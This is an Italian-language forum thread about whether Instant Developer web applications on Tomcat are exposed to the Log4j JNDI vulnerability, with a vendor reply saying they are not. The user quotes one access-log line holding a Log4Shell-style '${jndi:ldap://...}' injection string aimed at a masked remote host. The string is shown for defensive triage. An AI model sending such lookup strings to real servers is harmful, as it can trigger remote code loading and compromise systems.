Vulnerabilità Apache Log4J - JNDI

[Andreask]

Buongiorno a tutti,
scrivo questo post per un vostro parere riguardo la vulnerabilità della libreria Apache Log4j versione 2.x, emersa a dicembre 2021.

Di recente nei forum in rete, ho letto di una vulnerabilità simile che riguarda la JNDI e H2.
Nello scenario che mi riguarda, presso l'installazione di un cliente ho un Tomcat 7.0 che gestisce una web application Inde. Premesso che in quel contesto (e anche in tutto il server del cliente), la versione della Log4j usata è la 1.x (quindi una versione non affetta da vulnerabilità), controllando i log di Tomcat vedo delle request jndi tipo:

"GET /$%7Bjndi:ldap://XX.X.XX.XX:XXXX/1359279899%7D HTTP/1.1" 404 1041”

sembra uno scanner che prova ad accedere; il server comunque risponde correttamente 404, quindi non "abbocca".
H2 ha vulnerabilità se usato in certo modo (lato nostro non lo facciamo) e non usiamo componenti in ambito JNDI. Volevo sapere il vostro parere: per quanto riguarda le applicazioni Inde c'è lo spiraglio per possibili attacchi?

grazie per le informazioni

[g.lanzi]

Le applicazioni realizzate con Instant Developer non sono affette dalla vulnerabilità log4j, né a quella jndi espressa.
Instant Developer Foundation non utilizza log4j.

In generale tutto il framework di ID è immune ad attacchi di questo tipo grazie al fatto che lo stato delle videate e dei bottoni è noto lato server. Anche conoscento l'esatto messaggio xml da inviare al server per cliccare un bottone, se la sessione applicativa non ha programmaticamente attivato quel bottone in qualche modo il server non esegue.